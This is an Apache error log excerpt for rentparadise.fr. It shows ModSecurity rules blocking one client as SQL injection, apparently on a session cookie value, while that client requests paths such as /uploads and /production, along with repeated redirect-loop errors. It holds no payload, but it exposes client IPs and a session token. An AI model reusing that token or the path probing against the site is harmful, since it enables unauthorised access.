[Tue May 12 03:56:55.852354 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI57vMumyrWMfSu7q-DQAAANU"]
[Tue May 12 03:56:56.042994 2026] [core:error] [pid 1730175:tid 1730178] [client 74.249.238.26:60354] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:56.043029 2026] [core:error] [pid 1730175:tid 1730178] [client 74.249.238.26:60354] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:56.446343 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI57vMumyrWMfSu7q-DQAAANU"]
[Tue May 12 03:56:57.286562 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/uploads"] [unique_id "agKI6bOxS7i6i_mT2NLe9AAAAEM"]
[Tue May 12 03:56:57.286769 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/uploads"] [unique_id "agKI6bOxS7i6i_mT2NLe9AAAAEM"]
[Tue May 12 03:56:57.286976 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6bOxS7i6i_mT2NLe9AAAAEM"]
[Tue May 12 03:56:57.482279 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6bvMumyrWMfSu7q-DwAAANU"]
[Tue May 12 03:56:57.482486 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6bvMumyrWMfSu7q-DwAAANU"]
[Tue May 12 03:56:58.051223 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI6bvMumyrWMfSu7q-DwAAANU"]
[Tue May 12 03:56:58.629714 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/web"] [unique_id "agKI6rOxS7i6i_mT2NLe9gAAAEM"]
[Tue May 12 03:56:58.629921 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/web"] [unique_id "agKI6rOxS7i6i_mT2NLe9gAAAEM"]
[Tue May 12 03:56:58.630132 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6rOxS7i6i_mT2NLe9gAAAEM"]
[Tue May 12 03:56:58.817342 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6rvMumyrWMfSu7q-EQAAANU"]
[Tue May 12 03:56:58.817524 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI6rvMumyrWMfSu7q-EQAAANU"]
[Tue May 12 03:56:59.396511 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI6rvMumyrWMfSu7q-EQAAANU"]
[Tue May 12 03:56:59.847787 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/www"] [unique_id "agKI67OxS7i6i_mT2NLe-AAAAEM"]
[Tue May 12 03:56:59.847963 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/www"] [unique_id "agKI67OxS7i6i_mT2NLe-AAAAEM"]
[Tue May 12 03:56:59.848157 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI67OxS7i6i_mT2NLe-AAAAEM"]
[Tue May 12 03:57:00.055579 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7LvMumyrWMfSu7q-FAAAANU"]
[Tue May 12 03:57:00.055750 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7LvMumyrWMfSu7q-FAAAANU"]
[Tue May 12 03:57:00.146592 2026] [core:error] [pid 1691274:tid 1691278] [client 74.249.238.26:50250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:00.146626 2026] [core:error] [pid 1691274:tid 1691278] [client 74.249.238.26:50250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:00.632221 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI7LvMumyrWMfSu7q-FAAAANU"]
[Tue May 12 03:57:01.177734 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/main"] [unique_id "agKI7bOxS7i6i_mT2NLe-gAAAEM"]
[Tue May 12 03:57:01.177950 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/main"] [unique_id "agKI7bOxS7i6i_mT2NLe-gAAAEM"]
[Tue May 12 03:57:01.178147 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7bOxS7i6i_mT2NLe-gAAAEM"]
[Tue May 12 03:57:01.529993 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7bvMumyrWMfSu7q-FgAAANU"]
[Tue May 12 03:57:01.530201 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7bvMumyrWMfSu7q-FgAAANU"]
[Tue May 12 03:57:02.104082 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI7bvMumyrWMfSu7q-FgAAANU"]
[Tue May 12 03:57:02.561551 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/prod"] [unique_id "agKI7rOxS7i6i_mT2NLe_AAAAEM"]
[Tue May 12 03:57:02.561769 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/prod"] [unique_id "agKI7rOxS7i6i_mT2NLe_AAAAEM"]
[Tue May 12 03:57:02.561971 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7rOxS7i6i_mT2NLe_AAAAEM"]
[Tue May 12 03:57:02.633217 2026] [core:error] [pid 1730175:tid 1730199] [client 74.249.238.26:40564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:02.633239 2026] [core:error] [pid 1730175:tid 1730199] [client 74.249.238.26:40564] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:02.775227 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7rvMumyrWMfSu7q-GAAAANU"]
[Tue May 12 03:57:02.775414 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI7rvMumyrWMfSu7q-GAAAANU"]
[Tue May 12 03:57:03.239195 2026] [core:error] [pid 1707624:tid 1707687] [client 74.249.238.26:40547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:03.239231 2026] [core:error] [pid 1707624:tid 1707687] [client 74.249.238.26:40547] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:03.348761 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKI7rvMumyrWMfSu7q-GAAAANU"]
[Tue May 12 03:57:04.584822 2026] [core:error] [pid 1730207:tid 1730222] [client 74.249.238.26:40541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:04.584847 2026] [core:error] [pid 1730207:tid 1730222] [client 74.249.238.26:40541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:57:05.555792 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/production"] [unique_id "agKI8bOxS7i6i_mT2NLfAAAAAEM"]
[Tue May 12 03:57:05.555995 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/production"] [unique_id "agKI8bOxS7i6i_mT2NLfAAAAAEM"]
[Tue May 12 03:57:05.556190 2026] [security2:error] [pid 1707624:tid 1707685] [client 172.104.186.23:58694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKI8bOxS7i6i_mT2NLfAAAAAEM"]
